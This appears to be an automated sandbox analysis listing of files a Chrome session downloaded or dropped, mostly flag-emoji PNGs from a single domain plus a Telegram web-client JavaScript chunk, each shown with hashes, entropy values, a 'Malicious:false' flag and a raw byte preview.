                                  Preview:.PNG........IHDR.....................PLTEGpL.>Fh...iqi..h...ckf...nvf...mug...CM.how.$. ,.pw..:g..`...fmj..u...&1.jrg...pxg...CK.nv.ahg..d...lt.rz.fmg...lsi...s{.7A.qyl. `..n.#.T]..,..*........0...........1...........2.......0....%.+.6...!.;. .z-.qy.mu.k3.jr.hq.cl.em.]g.]Z.ck.X:.^h.Wb.a#._g.R^.Zc.\d.U`.LY.K<.Xa.JW.ES.T!.NY.?N.PZ.@=.J'.KU.:J.EP.@O.4E.4E.4D.3D.4D.6D.3D.3D.2C.3C.3C.?K.CN.1C.1B.0A.FO.1B.6F./@./@.;(..?./?.0A..?.->.<H.*B.6C.,=./>.-=.*;.*;.&@.):.-=.(9.)9.<F.2?.'8.&7.!@.)8.%6.%6.,;.%6.#5.#4.)3.#4."3..B.#3.!2.!2.)7.!2. 1.4>..0./:. 0.%4."1../..0.....C.....8.!0.'5..-..-..,..-."0..+..,..*..*..1.%2..+..(..(..)..?."...'..+..'.$0..&..%..'..%..$..$.....$..#..+..#..#.!-.."..!..!..*..".....&..+..#..... .....&..1.............."..(.....!|.&..'........ t.%...o.#v. ...}.....k..q..z..u..e..k..`..XQ.t...VtRNS....."%17CGSUXacegfpvz~......................................................................MIDATx.....U......T....3..I4..F.`.+..O.2.....\..}.."...wa .....B..Lf.R.u9.L.(:SmZH
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6044
                                  Entropy (8bit):7.941967109037597
                                  Encrypted:false
                                  SSDEEP:96:oIavQgZEc/ebQOFxUSCMI3M3njHKtaL53/v0ASzmoeW2YOXsGmH6gAgjc:vAEopM3HKtKPfSzmoh2HsGmIgA
                                  MD5:49F70BE2F73D107697C1EDD1CF052A31
                                  SHA1:F04CB0DFEE34FCA4B03CF4BB398D52F69F6390EF
                                  SHA-256:250CC87FE0798CE61BD4DB722C2C29D1A6875ADA2BA7AA9909A24C0BB2AAF6FE
                                  SHA-512:1DEFF2ED3359D60A3249275635D576CF1F0B4FE9B7B9CFF2AB926CA4E4EC7904DCD4CA45745FB7DB107A11368C33FF29CCBB9F3772CB2C5B27D0012EA65AA061
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..=dd...>fe...7lk...8..=ga...O...jf...7qe.JJs........9...ee..n...8...x<Qnk.]]...9..6hh.....gs..:aa...<ll..ek..4.ST..&....................................................................................ww.......hh..........\[........#....pk.JJyy..<<po..x.owph.(.DDad..//kii.66.l..&%it.t_Q."".EDZZ.....'*..... r_.....25R^U...QP.3s.......XS`...\X.HWL.......p=......MLGeK...".......i50V4.......b1...B@ESC.....Y2@C..^*...M7.....V'681h.N.G&13=....N$&&|%&}%%{%%z$${...""y8,..8 .C....!!w..v*($..t..s.:...^..qJ....n..X..P..y..k..X..q.)...P..h..D..e.....M..c..l..@..`..^..P..E..\.....f..:..Y..W.._..U..5..O..T..J..D..:..0...GH}RR.55s??..ZY::z..dii...dLH...hZZ.&'h..p...>;`..d.ww23\``..-.....44...n..Z.POABv""p..a.....b*)y........i..........ed...,,p$$v..k...QQ~.....Z......*tRNS...."18@ORcedkz{.~~.......................,.O....!IDATx^...N.0..ap.......*Q............/.8. .V..0.mn.f.m..B.!..B.!..!.J).4M.......6..!L?=..n+.f`.(.T..L..U].w.B.....6.....C..F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4442
                                  Entropy (8bit):7.92787409826961
                                  Encrypted:false
                                  SSDEEP:96:elQai6DHdRNZEiTYiNj8sdcq8+hzfoh5o/GikgreU5htoOG2:eWai6P/EiTYiN4s+q8Kzfo5o+iN1bog
                                  MD5:C17614918E42473F572F2278705E9BF8
                                  SHA1:39D2B5181D54A35C2FE18185CFE6FCBED1CB1DC7
                                  SHA-256:859650CD4034383D4B2BC14ADA21D739414EC63D9085FCC248C09986C5A5835B
                                  SHA-512:7D16833453FE6431AB6485737222EDE63695E6014F4B27C49FDF185C3E4077AC1FB18C6F7C5E08156FF7C9B43B3FF62B0FAFBCA8D560AE5CD41D6682808D9A46
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLj~.]o..r..2`.l/..I.V..........unvmcCyc.|b.fx.xbYo`Dfx.cu.fy.bt._q.wb.u_.y.,yc..s.~h.}f.du.|f.r.*q.+9Nmwa..o.q.+ew.k}.r]..t..s..s..i.,BkRe.Re.....4R.3Q.3P......C.C.<.....@.@.@.D.&L.(.(.)n...H.H-.-!H...&.&....'l.. .2Q...+.+#.#....,q......2P/.0:.:!~"=.=.....6.6.0t...........9}.......$.%...4.6.............8.8..#.1O......E.E.....$....:w.....1.1....4x...k.Rf..6~4.4*J......N.p..!d]q.C`....?O.t.....)Rcw.4.4..........W....."C-l-.Q.}f..0`8Y......=.E.t......H_.....y...%D|Mg.8U..EXWl.t]..z.yb....4P.BZ....s.+.0J.~.....5i....L.....%R......N.HN.E.....3.d....1x/.*E.!w./K4.5.Xl...*x.z)...).C.......n..?Z.Ni.'>.+....ar.8U.?J...a.a.H`.Of...$7.6Y.._.2T...#.#...+Dm.hx...|.....~.}..).).n|..2/.Fwx?djL.q~q.5.....D..x....*.....)..4......_.aV..Q.Q?.!.T.M[T.....6.......1tRNS...~cd~~cc~..h69.%..mX...L...Q.......c.7...~. (F....IDATx....K.g...F.`..61..<x.l......0[ .^...#..."!..`xW.. T,A'X.I.%.......=.:B...n...PH..........&i....~......>.......
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4519
                                  Entropy (8bit):7.7909120779818455
                                  Encrypted:false
                                  SSDEEP:96:PJ/oNSHSZbiYY9uFdLSOgNI7iJjBBRl6EAYKI+PeUuF/zj+nc:R/ogy0YYgFYOr+lBBRQrPbuyc
                                  MD5:90751CE7388283D98AB31C9849E6061A
                                  SHA1:708F1057170CAF243AE055B9947DD38FB35F23DF
                                  SHA-256:0846CF4B72CC93709AA1D3712DE597B17DE093C04D7F2830E8882B1056919CA7
                                  SHA-512:34D1E396F2BA1A02B339EC56C56FBC676FB0E5B0EC28601FF57ADCA96EF6931D68BF95B4B9C51646164757E28C75E74F72CED9E68B7B90DF38329CECC6766E8C
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f2.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.U4.`;.i@.rE.wH zI(.Q&}N.mA.b6.\8.e=.V4.Q2.M0.I,.E(.@".<..>".A'.D'.E(.E(9P:.G+.K/.H+.C&.H,.K..df.?".>!.;..tv.qs.vx.y{.............kk.WW.bb.().01.78.NO.MN.LM.JK.HI.FG.DE.BC.@A.=>.;<.89.67.45.22./0~-.|+,z)*x'(v..v..nwx........................................................y|..#.)..,1X.i......irz..P..S. _#$j..S............................QT.[^.gi.oq.km.cf.Z\.QT.HL.CF.?B.IM.BF.KO.TW.\_.eh...U.wF.k?.b..2LL.FFn.Q+9:.89|45r11h11g/0f....rt.np.pr.oq.z|.{}.z{.z|.|~.}..su.xz.|~.y{.tv.np.fj.cf.[_.TX.NR.IM.JN.JN.JO.FK.EI.BF.?C.=A.:?.:>.7;.49.26.04..2.,0.*..(+.%).%).!%..........'*.."....)-.?B.JL.NQ.PS.02./2./2.36.59.8<.7;.37..2.. ............=B.7<.15.........e..u.........K/.\..\-.[-.Z-.Y).W).V'.T%.R#.P .N..K..I.}F.zE.xB.u@.s>.q;.n9.l7.k6.h5.c..]0.V,.K&.G$.G%.N......tRNS.d....................>O+......................................................................~w~...........................................ccV.v$Ce.....6.....................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4545
                                  Entropy (8bit):7.932844373444874
                                  Encrypted:false
                                  SSDEEP:96:d2ZjqFWBpApOo1TBOPr0HiTUcnovgiMzPly0bunWiAbz:dWrApt1TBOT2iTBXvyAunhuz
                                  MD5:FABC39CB82F6E053EE2538E22521FB36
                                  SHA1:CB1B2FBDA46CA7A143D4E15EEE347C728DE194FD
                                  SHA-256:354D76B2F5C32F8C44DAD499E818FEE97920CAA582AF6671F7F21FBF8A6ED8F3
                                  SHA-512:37C379B300A6734E50F16BDE335631F658E7D07DE0F352B8C5915072E413E1759D32F9A071A059322CD635E9A6C205E88A635A0FA3AB9F799BD3D2F9039CD111
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..A.km..@.mp..A.ps..A.oq.$(."'..U.il..A.......kn..B.ru..B.QT.mo..A.or..B..A.sv..D.fi..<.@C....................................................................................................n.................:.....................................h......1.........o.............Im......... {.7...}......np..........z..su..=....mp.fi.hk.ae3...\`.l..S$.de.V[.\_.OT.]_.QU.HM.:3jj..QT.:9.UZ.AG.FJ.>Ckoo.9?.9?.8>.MQ.8>.7=.9?.FJ.5;.6<.1*3.".4:.:@.28.39.@D.17./5.-3.16.6>.,1."..5;.)/.*0SS..',.-3."#.&+.#).3;.$)./Z.'-.$*.!'..%.%+.....#.*... ..$.$)............r,m....n4...."&...."'.........88......0w.NH(~...&&.&&.N.ar.;%%.##.##.""..$. .!!|........u.!.........lE.K..~.....a..}..u..z..o..e..\..T..x..t..w..L..S..r..H..]..q..f..n..R..l..D..t..i..[..g..e..M..@..9.U.L....tRNS....15AL_cccry~......................QIDATx.....F...oF3.%.%).8y.4...S.9R..WH{.W.@...[..n..........j4.v..O>....K..U....P..j.Z.V..j.Z.V..+.-'b.pC"er&...Ik..=.a....!.!..I...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4482
                                  Entropy (8bit):7.881921811841147
                                  Encrypted:false
                                  SSDEEP:96:qvYFUvPDdGEzchVQePVnTTCXRkwN0hHigTmxlCYOcc7:qTkEzAVrYqwOhMxna
                                  MD5:5D13450B3BE29E13B494C862DAF27F6A
                                  SHA1:2F40395DEA0450A11F80A39487DAB80535BC2965
                                  SHA-256:F3962CAC0521763C9AF14F578A72D1CB363A60993E29A4D94C8A6A7DABE8605C
                                  SHA-512:798B58541DA827CCC7E7DD75F4DC12EDCC551E6D37CDA08AF879C94787AFF8810D7AC258756A3BD1F33A8D370BEA072467EBBA4B296D61029BD814E23EF060E3
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1ef.png
                                  Preview:.PNG........IHDR.....................PLTEGpL....W........X.....X.....W....j..T|."w/....W..X.......d......W.....X..V.......Y.....]#....P..V....[...................................................................................................................................................................................~...~.......}..}...|...{...}..y...y.....x....x..}..o..v.......u..r..l..z....q....j..o..m..y....t..k..[..|..i....h..r..}..d..f..i...ss...X..d....x..p..g..M.n^.tb....e..c.._..^..\..b..q..?.X[....Y..Y..W..5.K5.J3.H3.IA.\.XX3.I3.I3.H1.FM..[..0.E+.7F..1.G..C-.B0.D+.@%.0*.?..D!.7o|q'.<'.;7.iS|.,.@$.9...".7,.N#.7*.> .5..3..(".6..4).<..0!.5..1.....$.....2#.6..,.,,..*...#.4..(".2..%..%#.3.....$..(%}6.....#..*.{..x.!t/.{ .p)....s!.j*.l..e#.a&....^..Y..S..N.s......tRNS......%68MT]cdgf{~.............................................................................................................................................................IDAT
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5739
                                  Entropy (8bit):7.947163528488347
                                  Encrypted:false
                                  SSDEEP:96:5fDdpZ2lSUFLp05MzWQFx+Tttu4cF9iWuhlnnXGMzvt5Wfzn0UWecXiw66J0P:d7Z+DrzWQFxM/V+ahlnXGMrqWid
                                  MD5:517D8DEF81B5F18F04FE7AA9EC087449
                                  SHA1:3E335C832F514FD4182D95DF41A4DDB978B3A596
                                  SHA-256:36F5983AF31271542A7AC06C7D073D86A0ABFAC021A524FA08DAE5704FB65754
                                  SHA-512:E75A45D36B6165FF6239AAE873D45A879287672422B6960C37AC8E4324EB5789233EC4B4171BBD5346E2D880C9E05075221E41D2AA591ACBCDEA7E1E3CECC560
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.U2b...X4_...U2g...U2.V3<.fc...xJj...d>.Q-[...U1.a4b..i...U2h..V.y.V3f...U2k.._...X4i../.Z[.~j...Q....................;..<........>..C..H..8..A..H....E.....H..F..H..;..D..=..A..7.....H..@..?.....1..=..O....I..=..;..9..+..8..6..I....T.4.....#.1..N...<....).a..Vm.....I..6..X..j....5..p...q.]..Hj....t.....wL.h[..S..J..A.}S.W.~...i.D:.lL.}7.xS.}...@.xY.}..s&.pE.v2.rO.w$.oR.w'.o%.oxx..z.Y.?%.m".mB.r!.k2.o$.j8.T.v...j..r..iE.p$.i..hpp.3.k..f..uvp...e .f6.i..d..c!.d..r..b .c>.h..a..a.._!.`*.a..l..^gg.".`..^ri}1.c..]..[..h..[fd...Z..Y..Y..X..c..X..Y..X_`...V..V0.\..V..X..T..T..V..]Z\.Z\...S..U..RX[.\W...Q..UWY...P..OUW...N..N..M..O..L..PRU...MOT...K..K..J.}N..INP...IEM..xJ..F.vI.|FIJ..sG.zA=F.DF..nC.u@.i@.p;.e=.k;8=..`;.c5.\7._3.Z1.V1.R-.M)d.._..]...n0...."tRNS...."/8CTUTcdegmz~................cB......IDATx^..A..0.EA..E(|H."z.;F.......4..........*E.Br7+. 1.e;..{..}..../ou..6..q|d"...*.....f/WU.K..B..e.d...tC..v...A......,.J..8z1..e
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4247
                                  Entropy (8bit):7.921508291878352
                                  Encrypted:false
                                  SSDEEP:96:kW0n7LivCK+wJqYl6HWmP1rG7kGJYWWCGl4U1ahhvffk0T2i:kTG2wJjQH7sfJY1Afj9
                                  MD5:9538AF5882E234349A8A486BBB16F62B
                                  SHA1:83DD5BC80FA8B0CFA4181F3CBF760A811D451AA5
                                  SHA-256:6B3511721A0632E98ACA403C05992AD2D161C0C84B214569F8CE1DE759C4CAF1
                                  SHA-512:3E926CECB16F7C9E4381E71F08764367082ADFF22B296A50C6D2FF5F7E6A09213E1504F9F9D7FA36A4E72DA571FB428B3EBFB31D861E822733330B679257E298
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1f0.png
                                  Preview:.PNG........IHDR.....................PLTEGpL(O(i.i....8..7....l.l.D..:.j.j....9.`.`.=.....Q.k.k.;.mtm.;.d.d..........;.d.dttt......k.k.;.ttt...c.cyyy.<.qqq...zzzvvvi.i...yyyvvv....=.j.j....3......sss.?....k.k[.[.2.rrr............................................................................................................................................................................................................u.u......h.h...e.e...j.jf.f|||b.byyyQ.Q^.^vvvX.Xuuu\.\sssR.RW.WG.GL.LiriR}RF.FI~I>.>FyF;~;5.5CuC/./4x4)})*{*&}&:n:5q5%|%(y(%{%${$$z$#z#$y$$x$"y"*s*"x" x $u$!w! w v !t!.v..u..t..s.)k).s.!p!.r..s..r..q..p..m..p..o..n..i..q..m..l..e..j..g..m..j..h..`..e..c..f..e..j..`..\..c..b..e..Y..`..U..^..W..]..^..]..Y..\..Q..U..P..[..Z..Y..X..L..W..R..H..V..U..T..E..P..L..B..H..=..B..:..6..0...*"...;tRNS......$$&39AGT[ccegovy~~...........................................IDATx...k.\.y.....93{..c...X.`.BZ ..i....R..T.^.J.H.P..H..*.K.V..*...# .B."UQ$Z........2.P@D...].zf.y....9:;.g
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3941
                                  Entropy (8bit):7.862144332099234
                                  Encrypted:false
                                  SSDEEP:96:ktnfNwlFnPWY/fvKfbh3OT+/ZkkiwgdXX3AodnvvhET1pK8o:ENwPvyteqhkkiLASvvheXK8o
                                  MD5:0BAA4FC5E09DD1168A54262BAE9E3B99
                                  SHA1:926D2F10BB8D053DCEC7FAA453DC06322401C86B
                                  SHA-256:6B12499C7A84F6CFA8816F98DE3F63B54F82ABF3CDFFF8D43B4E1B1FB115ADAC
                                  SHA-512:426634C15A0FDCB4909D362FE187129A99C30B311C0D0814714D258772B2920A3E0244C19BA8B037B6CEB0ABA2022D723FBE812BA0729237D25C76A2652E7F4E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLR4:.p}....gt....iw....bp....r..ft....iw.@T....... 4.p}....es....A..Z3.hu.9.....r..bq....o|.bp....s..lz....gu....m{......G]D.r..Ma.cr...................................................................................................................................................w.t......w..f{.q.....m{.WsW.p.iw.cs.^p.ds.Xl.`n.Sh.Xj.Lduuu.Zi.Mc.Uf.F^.B].M`.Pa.=X.AX.J].8Tiii.4Q.3Q.5R.AW0.O.2P.3Pfff.1O.7Q.0N.CU./M.-L.<R.-K..L.6O.+I^`Z.*H.(F.+H..H.1I.&D. B.}?.$B.$B."@YVR.(CyI?.5C.y;. ?..=..:..;.v9..<.$?..;. <.u6.{3.l=..9..8)f4.r4.!;.p3..62]4.o1.h0..4..6JJJ..4..4.!7.r+.m.JL..k/<Q-..1..0.j,.i,....h*.....4CCC.f)..4.e(..,.d'..+.c'.b&.a%.`$._#.\#..!:::..(....Y ....S..Q..K..I.....B..?.&&&.:.%%%###!!! ......................................................S..h.../tRNS.......%)37:GTUaccehv{~.........................*......IDATx...ko..}...9s].....l.J...X)ZWN....4m.j."..zA.>QZ......m..~.i....Yn.W.S..K..%ww.....rf9.r..Ed.`.3..r...9..!.p.c8.Y.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4321
                                  Entropy (8bit):7.887516336348053
                                  Encrypted:false
                                  SSDEEP:96:cZjr49QCvoqZ6w15yHCryYY1lCRxxp3/H2zSGR3YKL:KFy5GCrn64Rndf2z9JL
                                  MD5:066513B5648E745587265D7C0EE92AAE
                                  SHA1:48E75035D4E204289FB2C5CF40A8EB7AE12684F6
                                  SHA-256:EE4723AE96A4C35C45EA71FCA62E68188E2985AA2E000CDEB522FE40D9B16775
                                  SHA-512:4F335200B29EB9BE3696226E70323CC239609949C1BA5D4FE7850345A7A9181FF269B72918D3B39DC4AE3C907345114E2DC728B0A98464B41AF98A9455FD9278
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.eqc...Ua\...Xdg...T`.Wd\....<x.U.y..iyi...Vb_...Yf......_...Yf...i...Q].^kb...R^.Wdj...Xe`...Yfk..[...]j.O[.R_..c.._..c.._..M..T..[..L..^..^..]..R..\..K..Y..D..V..f..T..P..p..=..N..K..5..v..H..E..Z..D....r..A..F..-..@..>..J.1..<...:.;.8.8...E..O..ij...A..\K..k..N..h....2a....GX..M..^..b..q.t6..C..;...<1..M..W..^....=6.....&..&..%..%..)..@..$..$..Y.."..$..3..%.....H.."..%.."..J.. .....#..N........7.....$.....,.....N..<........... .........B=........e.g*..3..............*........>........+................................~u;......2..............................................................sg2.......~..y..v.b[3.y..q..m|.q..hw.l~.es.an.^k._n.ZgJE+8GI.Yg.Uc.R_.MZ.DM45..18$$#."# .........................................................................&tRNS....%.8@PTcccceesx{~..................[A....jIDATx......]...y.=....Nb.6-.*W......E......".......w....n@*..UB.(U.A..B...iID.IZ.....vwv.~.|O..'.3...'...V...W...s......k+f<....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4831
                                  Entropy (8bit):7.84776983581594
                                  Encrypted:false
                                  SSDEEP:96:uMQAkSGgVNKtdh8ZU3C5MU8qo7pYLBLex+jBr5ItNs96FalOfEMO1auM5E2:QTSZfOyU3C5OlEBqxEN5+i6Fa8EfM5H
                                  MD5:16DC194741F0582C536D9FDCE7C11404
                                  SHA1:0A85ED96E95012F293FD1B15A0F50AA19E3FAE0A
                                  SHA-256:F51B0DFBBAE120FCC2BF1E97614797D377CC718C9405D4ED0036590D440B2AF7
                                  SHA-512:B776959A6FFBBF8747C661E8BFC28D3F4A595645F1B676832FF353FA17557CC433C60BFE0F84E222F2C40111F658EA3901F18CE623B4BF707AD333DC3C4300CC
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1ee.png
                                  Preview:.PNG........IHDR.....................PLTEGpLRh.Sh....1Hz}../Fw...../Fw0Gw}........Dc.<X....Rn..Ev|..+Bs....../L.Zo.0Hy...0Gw...z..0Gx...-Du...)@q6M......4K|(?pTn.z...................................................................................................................................................................................b../.....c........p..9........q.........w........w.......%}....y..}....t..k.s......o..l..k..k..j..s..j..v..0..z..i..h..l...i..}.....g..h..f..e..B..g..l..d..c..q..d..b..^..h..u..`..b.._..Y..^..l..._.f..\.._..\..n..Z..U..Z..6..Y..[..W..d..^..V..g..P..U..V..Y..S..T~.R~.[}.M}.Q|.T|.O{.Oz.ay.Sy.My.Mx.Rw.Gw.Kw.Lu.Ju.Hu.Ot.Ht.Rs.Hs.Gr.Fq.@q.Kp.Ep.Ep.Do.Dn.>n.Km.Dm.Ai.8i.Gg.Ag.Ed.4d.Db.BT.<b.=`.A^.<^.=Z.7Y.;V.6V.9S.1Q.8O.0O.3K..K.-I.-Ey)At&=oP.......tRNS.....%,5==NTcccceffix.~~...........................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4382
                                  Entropy (8bit):7.849311276675441
                                  Encrypted:false
                                  SSDEEP:96:Ynjt4svNUmFqiIUp8NxtZjAwi50zt4kqB3+gysm8JJw1Wo+sM8Z3Z:6amFqNdNbk0fq1ndm8XXQZ
                                  MD5:1FCC75099D7990FE1C814273ECA3541D
                                  SHA1:6E6B199C763BD01FB45D025B768CC2E23F5BAFF7
                                  SHA-256:4F35ED346D3CFE96927E3EF0A787816C8CAEC2DF56927ECA0DC5AA9BF079AE25
                                  SHA-512:630921CC286735DC8CD64900FE15BF694F7AE31572735858D3543714F4769DFDE5D5183C9BDD1872E6EE41C7351D1D221F875581AFDB81095698851B0FB77335
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..LRiY.}h..7V<.wa..zk'.KDi...|.l$.FAH..j..#xT.|.l#.>Kh...m".T9.Bi<d..|.BIp..h..b\..m%.{.=O.m$m...<V.}.m$g...eH.8Wm...z.R6....m$.|d...Q5El...C..G..A..K..E..J..I..@..J..G..M..J..G..H..E..E..N..I..G..D..V..H..D..+..O..C..C..*..N..F..B..@..5..\..@..@..S..C..>..5..?..c..H..<..=..W..=..X..2..<..C..;..d..R..=..Y.k.@.].{..@.k.._.6.>.u.?.=.j.s..d.<.9..X..i..W..t.8~.o.7l.t..5i.o\.xP.|..2k..C..D.|..19..e..8..5..1..l....,'..\..M.~...f.......,P.z;.x/.nB.v_....lS...{)3.qF.s#.n6.o".m..s.v'$.l%.k .kTz.L|...q..i%.j..h&.h..g@z..p&..f8.h..e..d&.f..c.m"..b..b..a..a.j .._<s.1u..._..^/t...^,t...].s...\%.^.r...\&r...[,q...[+o.%o.0l.*m.(l.jb+..V'k.&j.9e."{V%i.$h."xT'g.#g."f..|P!d.'b. c..sN.a.._.&Z..[..oH.jH.U..dD.R. Py._>.M{.Js.X;.S6.Dn.Bi.@f.M2.=_.9Y.5UC.c.....tRNS......!%).8;EHU\ceddu}|~...........................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65453)
                                  Category:dropped
                                  Size (bytes):73118
                                  Entropy (8bit):5.375340520479466
                                  Encrypted:false
                                  SSDEEP:768:cVA2f7aRt98PzulV1096Dt6Smz2eVIa7qfzAA+f+KUFCq81f/oCKfTAdTAGiYUCp:CmF8rubCExL8lpD/oZbSl94tf97k3b
                                  MD5:371C55C21420E77D6600E4FA43692103
                                  SHA1:5ADF626B2E9C9589C090F1B8725191262D13536B
                                  SHA-256:EFD30D40DB473B3F19FA9EF94F7A0E7CB4FFE839D38211E4AA1772DF4004040A
                                  SHA-512:8E29BD4732F5F7BA872BD485D74B5A4CC38F2EB8FE2DE65EBBFA9F2F66200AC75E5696B52E8B939CE04AFA1E83104D5869647576D633F58AD7B6512E97E7EEE7
                                  Malicious:false
                                  Reputation:low
                                  Preview:/*! For license information please see 5648.343cae73c4dc2e71af86.js.LICENSE.txt */.(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[5648],{7692:(t,e,r)=>{"use strict";r.r(e),r.d(e,{CTR:()=>d,IGE:()=>v,default:()=>w});var n=new Uint8Array(256),o=new Uint8Array(256),i=new Uint32Array(256),u=new Uint32Array(256),s=new Uint32Array(256),a=new Uint32Array(256),f=new Uint32Array(256),c=new Uint32Array(256),p=new Uint32Array(256),l=new Uint32Array(256);function h(t){if(t instanceof Uint32Array)return t;if("string"==typeof t){if(t.length%4!=0)for(var e=t.length%4;e<=4;e++)t+="\0x00";var r=new Uint32Array(t.length/4);for(e=0;e<t.length;e+=4)r[e/4]=(o=e,(n=t).charCodeAt(o)<<24^n.charCodeAt(o+1)<<16^n.charCodeAt(o+2)<<8^n.charCodeAt(o+3));return r}var n,o;if(t instanceof Uint8Array){for(r=new Uint32Array(t.length/4),e=0;e<t.length;e+=4)r[e/4]=t[e]<<24^t[e+1]<<16^t[e+2]<<8^t[e+3];return r}throw new Error("Unable to create 32-bit words")}function y(t,e,r){void 0===r&&(r=t);for(va
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4754
                                  Entropy (8bit):7.933628672832123
                                  Encrypted:false
                                  SSDEEP:96:Fr9hYpO+ovW15JLfQcuSZn9JN4leRLa28hzfFFXE+lZkCyUfIMmDntO:FhhYA+GW15JLYcv9JmleRLa2ILQCyUgK
                                  MD5:474B6568D80533F3B7FF428703421D22
                                  SHA1:6614870C31F2E0EA61BCD5C3E861F143DFBE1082
                                  SHA-256:91ADE6BF3C4300BEA178076406F7343B34BACC52E9F026B0B735BFD424B7A8DC
                                  SHA-512:BE8C524410C2B2AC4CB8384DB5DE87D1B26CD2C9B6494708FB3F26EA192677B56426B43EE17E31C552A8CD45AD7DE69BF8C5570C902E9BA64D205D2D724D63A6
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fd-1f1f0.png
                                  Preview:.PNG........IHDR.....................PLTEGpL8Hmm|.v..&7]r..#4Zu..aq..)Oy....Tp...0Wu..!2Xz..!2Z[j.-Bsl{..-St...)O]m..,\0Dpn}.z...-Sm|../Tv..o..Td..-Slz.y..dt../Uq...-Sn}..(Nz..#4ZK\..&Ls.."3Ym{._p.y.....................................k.m.p.o.i.p.o....n.n.k.j.u.l.....v....y....~...............{.....s.....x..u..l..r..o..v~.f..k~.m}.g|.jz.fy.]y.ay.fv._u.[u._s.Vq.Yq.^p.Sn.Tl.Xl.Ol.Lj.Sh.Kh.Gh.Fg.Eg.Mf.Ff.Ef.Ff.He.De.Ee.De.Ae.Cd.Nc.Cc.Bc.Cc.Ib.Bb.>b.Aa.@a.@`.A`.@`.C_.A_.=_.>_.I^.>^.<].=].<\.B\.9\.;[.>[.;[.:Z.;Z.9Z.9Y.=Y.9Y.8X.8X.8W.6W.CV.;V.6V.5V.5U.5T.9T.3T.3S.5S.3S.6R.2R.6Q.1Q.0P.3P.1P./O.;N{/O.1N..N.,N..N.2M.4M.-M.-M.-L.,L.1K.-K.+K.*J.*J.*I.)I.+I./H.(H.(H./G|'G.(G.&F.&E.(E.%E.$D.-Cu$C.#C.#B.(B{"B.#B.,Ar"A.!A. A.!@. @.!?.)>l#=v.=~.<}':e#:m.9v%7`.7r.6j$5].3k.2Z.1b.-_.-U.,\.)R.&N.$Kw.....5tRNS.......'&'03@AOP[]`bdipv{~...........................^.D....IDATx....\g.....v^fv7.l.M7..I..7kk..UKmS-.....P.........A..A/.. .......b4...4..m...fgfg.9...00..:X...\,.../..y..S
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5345
                                  Entropy (8bit):7.94153249145176
                                  Encrypted:false
                                  SSDEEP:96:3dKmwDAmTQ13VRI0VYy/40sgJ0ZZCHmc6H/RmL4nRy8IfI4F+JZqTUXS:HmT0VYQ40Eut6ZmwNIkJZOx
                                  MD5:29FCA84D679A698BEA04DC37B8E7A3C2
                                  SHA1:39FAAB00B2796D383E736B2765EA3E02182E2F3A
